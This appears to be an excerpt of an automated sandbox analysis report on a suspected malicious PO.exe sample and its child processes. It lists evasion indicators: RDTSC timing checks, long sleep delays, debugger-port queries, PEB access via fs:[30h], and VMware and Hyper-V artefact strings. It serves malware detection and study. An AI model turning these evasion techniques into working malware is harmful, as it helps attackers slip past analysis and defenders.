Source: C:\Windows\SysWOW64\wlanext.exe	RDTSC instruction interceptor: First address: 000000000283898E second address: 0000000002838994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe

Code function: 11_2_004088C0 rdtsc

11_2_004088C0

Source: C:\Users\user\Desktop\PO.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\PO.exe	Window / User API: threadDelayed 431			Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Window / User API: threadDelayed 9349			Jump to behavior

Source: C:\Users\user\Desktop\PO.exe TID: 7032	Thread sleep time: -12912720851596678s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe TID: 7092	Thread sleep count: 431 > 30	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe TID: 7092	Thread sleep count: 9349 > 30	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe TID: 7032	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 352	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\wlanext.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\PO.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Thread delayed: delay time: 30000			Jump to behavior

Source: explorer.exe, 0000000F.00000000.774873879.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000F.00000000.770052583.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 0000000F.00000000.770654125.0000000006650000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000F.00000000.774873879.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000F.00000002.917614118.0000000004755000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 0000000F.00000000.775024682.000000000A716000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 0000000F.00000000.770052583.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 0000000F.00000000.770052583.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 0000000F.00000000.775024682.000000000A716000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: PO.exe, 00000000.00000002.752842533.0000000000C41000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: explorer.exe, 0000000F.00000000.770052583.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\PO.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe

Code function: 11_2_004088C0 rdtsc

11_2_004088C0

Source: C:\Users\user\Desktop\PO.exe

Code function: 0_2_05AC25B0 LdrInitializeThunk,

0_2_05AC25B0

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BB51BE mov eax, dword ptr fs:[00000030h]	11_2_01BB51BE
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BB51BE mov eax, dword ptr fs:[00000030h]	11_2_01BB51BE
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BB51BE mov eax, dword ptr fs:[00000030h]	11_2_01BB51BE
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BB51BE mov eax, dword ptr fs:[00000030h]	11_2_01BB51BE
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B599BF mov ecx, dword ptr fs:[00000030h]	11_2_01B599BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B599BF mov ecx, dword ptr fs:[00000030h]	11_2_01B599BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B599BF mov eax, dword ptr fs:[00000030h]	11_2_01B599BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B599BF mov ecx, dword ptr fs:[00000030h]	11_2_01B599BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B599BF mov ecx, dword ptr fs:[00000030h]	11_2_01B599BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B599BF mov eax, dword ptr fs:[00000030h]	11_2_01B599BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B599BF mov ecx, dword ptr fs:[00000030h]	11_2_01B599BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B599BF mov ecx, dword ptr fs:[00000030h]	11_2_01B599BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B599BF mov eax, dword ptr fs:[00000030h]	11_2_01B599BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B599BF mov ecx, dword ptr fs:[00000030h]	11_2_01B599BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B599BF mov ecx, dword ptr fs:[00000030h]	11_2_01B599BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B599BF mov eax, dword ptr fs:[00000030h]	11_2_01B599BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B661A0 mov eax, dword ptr fs:[00000030h]	11_2_01B661A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B661A0 mov eax, dword ptr fs:[00000030h]	11_2_01B661A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BF49A4 mov eax, dword ptr fs:[00000030h]	11_2_01BF49A4
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BF49A4 mov eax, dword ptr fs:[00000030h]	11_2_01BF49A4
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BF49A4 mov eax, dword ptr fs:[00000030h]	11_2_01BF49A4
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BF49A4 mov eax, dword ptr fs:[00000030h]	11_2_01BF49A4
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BB69A6 mov eax, dword ptr fs:[00000030h]	11_2_01BB69A6
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B62990 mov eax, dword ptr fs:[00000030h]	11_2_01B62990
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B6A185 mov eax, dword ptr fs:[00000030h]	11_2_01B6A185
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B5C182 mov eax, dword ptr fs:[00000030h]	11_2_01B5C182
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B3B1E1 mov eax, dword ptr fs:[00000030h]	11_2_01B3B1E1
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B3B1E1 mov eax, dword ptr fs:[00000030h]	11_2_01B3B1E1
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B3B1E1 mov eax, dword ptr fs:[00000030h]	11_2_01B3B1E1
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BC41E8 mov eax, dword ptr fs:[00000030h]	11_2_01BC41E8
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B6513A mov eax, dword ptr fs:[00000030h]	11_2_01B6513A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B6513A mov eax, dword ptr fs:[00000030h]	11_2_01B6513A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B54120 mov eax, dword ptr fs:[00000030h]	11_2_01B54120
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B54120 mov eax, dword ptr fs:[00000030h]	11_2_01B54120
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B54120 mov eax, dword ptr fs:[00000030h]	11_2_01B54120
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B54120 mov eax, dword ptr fs:[00000030h]	11_2_01B54120
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B54120 mov ecx, dword ptr fs:[00000030h]	11_2_01B54120
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B39100 mov eax, dword ptr fs:[00000030h]	11_2_01B39100
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B39100 mov eax, dword ptr fs:[00000030h]	11_2_01B39100
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B39100 mov eax, dword ptr fs:[00000030h]	11_2_01B39100
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B3B171 mov eax, dword ptr fs:[00000030h]	11_2_01B3B171
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B3B171 mov eax, dword ptr fs:[00000030h]	11_2_01B3B171
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B3C962 mov eax, dword ptr fs:[00000030h]	11_2_01B3C962
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B5B944 mov eax, dword ptr fs:[00000030h]	11_2_01B5B944
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B5B944 mov eax, dword ptr fs:[00000030h]	11_2_01B5B944
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B6F0BF mov ecx, dword ptr fs:[00000030h]	11_2_01B6F0BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B6F0BF mov eax, dword ptr fs:[00000030h]	11_2_01B6F0BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B6F0BF mov eax, dword ptr fs:[00000030h]	11_2_01B6F0BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B620A0 mov eax, dword ptr fs:[00000030h]	11_2_01B620A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B620A0 mov eax, dword ptr fs:[00000030h]	11_2_01B620A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B620A0 mov eax, dword ptr fs:[00000030h]	11_2_01B620A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B620A0 mov eax, dword ptr fs:[00000030h]	11_2_01B620A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B620A0 mov eax, dword ptr fs:[00000030h]	11_2_01B620A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B620A0 mov eax, dword ptr fs:[00000030h]	11_2_01B620A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B790AF mov eax, dword ptr fs:[00000030h]	11_2_01B790AF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B39080 mov eax, dword ptr fs:[00000030h]	11_2_01B39080
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BB3884 mov eax, dword ptr fs:[00000030h]	11_2_01BB3884
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BB3884 mov eax, dword ptr fs:[00000030h]	11_2_01BB3884
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B5B8E4 mov eax, dword ptr fs:[00000030h]	11_2_01B5B8E4
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B5B8E4 mov eax, dword ptr fs:[00000030h]	11_2_01B5B8E4
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B340E1 mov eax, dword ptr fs:[00000030h]	11_2_01B340E1
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B340E1 mov eax, dword ptr fs:[00000030h]	11_2_01B340E1
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B340E1 mov eax, dword ptr fs:[00000030h]	11_2_01B340E1
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B358EC mov eax, dword ptr fs:[00000030h]	11_2_01B358EC
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BCB8D0 mov eax, dword ptr fs:[00000030h]	11_2_01BCB8D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BCB8D0 mov ecx, dword ptr fs:[00000030h]	11_2_01BCB8D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BCB8D0 mov eax, dword ptr fs:[00000030h]	11_2_01BCB8D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BCB8D0 mov eax, dword ptr fs:[00000030h]	11_2_01BCB8D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BCB8D0 mov eax, dword ptr fs:[00000030h]	11_2_01BCB8D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BCB8D0 mov eax, dword ptr fs:[00000030h]	11_2_01BCB8D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B5A830 mov eax, dword ptr fs:[00000030h]	11_2_01B5A830
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B5A830 mov eax, dword ptr fs:[00000030h]	11_2_01B5A830
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B5A830 mov eax, dword ptr fs:[00000030h]	11_2_01B5A830
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B5A830 mov eax, dword ptr fs:[00000030h]	11_2_01B5A830
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B6002D mov eax, dword ptr fs:[00000030h]	11_2_01B6002D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B6002D mov eax, dword ptr fs:[00000030h]	11_2_01B6002D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B6002D mov eax, dword ptr fs:[00000030h]	11_2_01B6002D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B6002D mov eax, dword ptr fs:[00000030h]	11_2_01B6002D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B6002D mov eax, dword ptr fs:[00000030h]	11_2_01B6002D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B4B02A mov eax, dword ptr fs:[00000030h]	11_2_01B4B02A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B4B02A mov eax, dword ptr fs:[00000030h]	11_2_01B4B02A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B4B02A mov eax, dword ptr fs:[00000030h]	11_2_01B4B02A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B4B02A mov eax, dword ptr fs:[00000030h]	11_2_01B4B02A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BB7016 mov eax, dword ptr fs:[00000030h]	11_2_01BB7016
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BB7016 mov eax, dword ptr fs:[00000030h]	11_2_01BB7016
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BB7016 mov eax, dword ptr fs:[00000030h]	11_2_01BB7016
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01C01074 mov eax, dword ptr fs:[00000030h]	11_2_01C01074
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BF2073 mov eax, dword ptr fs:[00000030h]	11_2_01BF2073
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01C04015 mov eax, dword ptr fs:[00000030h]	11_2_01C04015
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01C04015 mov eax, dword ptr fs:[00000030h]	11_2_01C04015
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B50050 mov eax, dword ptr fs:[00000030h]	11_2_01B50050
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B50050 mov eax, dword ptr fs:[00000030h]	11_2_01B50050
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B64BAD mov eax, dword ptr fs:[00000030h]	11_2_01B64BAD
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B64BAD mov eax, dword ptr fs:[00000030h]	11_2_01B64BAD
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B64BAD mov eax, dword ptr fs:[00000030h]	11_2_01B64BAD
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B62397 mov eax, dword ptr fs:[00000030h]	11_2_01B62397
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B6B390 mov eax, dword ptr fs:[00000030h]	11_2_01B6B390
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BF138A mov eax, dword ptr fs:[00000030h]	11_2_01BF138A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B41B8F mov eax, dword ptr fs:[00000030h]	11_2_01B41B8F
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B41B8F mov eax, dword ptr fs:[00000030h]	11_2_01B41B8F
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BED380 mov ecx, dword ptr fs:[00000030h]	11_2_01BED380
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B603E2 mov eax, dword ptr fs:[00000030h]	11_2_01B603E2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B603E2 mov eax, dword ptr fs:[00000030h]	11_2_01B603E2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B603E2 mov eax, dword ptr fs:[00000030h]	11_2_01B603E2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B603E2 mov eax, dword ptr fs:[00000030h]	11_2_01B603E2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B603E2 mov eax, dword ptr fs:[00000030h]	11_2_01B603E2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B603E2 mov eax, dword ptr fs:[00000030h]	11_2_01B603E2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B5DBE9 mov eax, dword ptr fs:[00000030h]	11_2_01B5DBE9
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01C05BA5 mov eax, dword ptr fs:[00000030h]	11_2_01C05BA5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BB53CA mov eax, dword ptr fs:[00000030h]	11_2_01BB53CA
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BB53CA mov eax, dword ptr fs:[00000030h]	11_2_01BB53CA
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01C08B58 mov eax, dword ptr fs:[00000030h]	11_2_01C08B58
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BF131B mov eax, dword ptr fs:[00000030h]	11_2_01BF131B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B63B7A mov eax, dword ptr fs:[00000030h]	11_2_01B63B7A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B63B7A mov eax, dword ptr fs:[00000030h]	11_2_01B63B7A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B3DB60 mov ecx, dword ptr fs:[00000030h]	11_2_01B3DB60
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B3F358 mov eax, dword ptr fs:[00000030h]	11_2_01B3F358
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B3DB40 mov eax, dword ptr fs:[00000030h]	11_2_01B3DB40
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B4AAB0 mov eax, dword ptr fs:[00000030h]	11_2_01B4AAB0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B4AAB0 mov eax, dword ptr fs:[00000030h]	11_2_01B4AAB0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B6FAB0 mov eax, dword ptr fs:[00000030h]	11_2_01B6FAB0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B352A5 mov eax, dword ptr fs:[00000030h]	11_2_01B352A5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B352A5 mov eax, dword ptr fs:[00000030h]	11_2_01B352A5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B352A5 mov eax, dword ptr fs:[00000030h]	11_2_01B352A5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B352A5 mov eax, dword ptr fs:[00000030h]	11_2_01B352A5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B352A5 mov eax, dword ptr fs:[00000030h]	11_2_01B352A5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B6D294 mov eax, dword ptr fs:[00000030h]	11_2_01B6D294
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B6D294 mov eax, dword ptr fs:[00000030h]	11_2_01B6D294
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B62AE4 mov eax, dword ptr fs:[00000030h]	11_2_01B62AE4
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B62ACB mov eax, dword ptr fs:[00000030h]	11_2_01B62ACB
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B74A2C mov eax, dword ptr fs:[00000030h]	11_2_01B74A2C
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B74A2C mov eax, dword ptr fs:[00000030h]	11_2_01B74A2C
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B5A229 mov eax, dword ptr fs:[00000030h]	11_2_01B5A229
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B5A229 mov eax, dword ptr fs:[00000030h]	11_2_01B5A229
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B5A229 mov eax, dword ptr fs:[00000030h]	11_2_01B5A229
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B5A229 mov eax, dword ptr fs:[00000030h]	11_2_01B5A229
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B5A229 mov eax, dword ptr fs:[00000030h]	11_2_01B5A229
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B5A229 mov eax, dword ptr fs:[00000030h]	11_2_01B5A229
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B5A229 mov eax, dword ptr fs:[00000030h]	11_2_01B5A229
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B5A229 mov eax, dword ptr fs:[00000030h]	11_2_01B5A229
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B5A229 mov eax, dword ptr fs:[00000030h]	11_2_01B5A229
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01C08A62 mov eax, dword ptr fs:[00000030h]	11_2_01C08A62
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B35210 mov eax, dword ptr fs:[00000030h]	11_2_01B35210
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B35210 mov ecx, dword ptr fs:[00000030h]	11_2_01B35210
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B35210 mov eax, dword ptr fs:[00000030h]	11_2_01B35210
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B35210 mov eax, dword ptr fs:[00000030h]	11_2_01B35210
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B3AA16 mov eax, dword ptr fs:[00000030h]	11_2_01B3AA16
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B3AA16 mov eax, dword ptr fs:[00000030h]	11_2_01B3AA16
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B53A1C mov eax, dword ptr fs:[00000030h]	11_2_01B53A1C
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BFAA16 mov eax, dword ptr fs:[00000030h]	11_2_01BFAA16
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BFAA16 mov eax, dword ptr fs:[00000030h]	11_2_01BFAA16
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B48A0A mov eax, dword ptr fs:[00000030h]	11_2_01B48A0A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B7927A mov eax, dword ptr fs:[00000030h]	11_2_01B7927A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BEB260 mov eax, dword ptr fs:[00000030h]	11_2_01BEB260
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BEB260 mov eax, dword ptr fs:[00000030h]	11_2_01BEB260
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BFEA55 mov eax, dword ptr fs:[00000030h]	11_2_01BFEA55
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BC4257 mov eax, dword ptr fs:[00000030h]	11_2_01BC4257
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B39240 mov eax, dword ptr fs:[00000030h]	11_2_01B39240
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B39240 mov eax, dword ptr fs:[00000030h]	11_2_01B39240
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B39240 mov eax, dword ptr fs:[00000030h]	11_2_01B39240
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B39240 mov eax, dword ptr fs:[00000030h]	11_2_01B39240
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B61DB5 mov eax, dword ptr fs:[00000030h]	11_2_01B61DB5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B61DB5 mov eax, dword ptr fs:[00000030h]	11_2_01B61DB5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B61DB5 mov eax, dword ptr fs:[00000030h]	11_2_01B61DB5
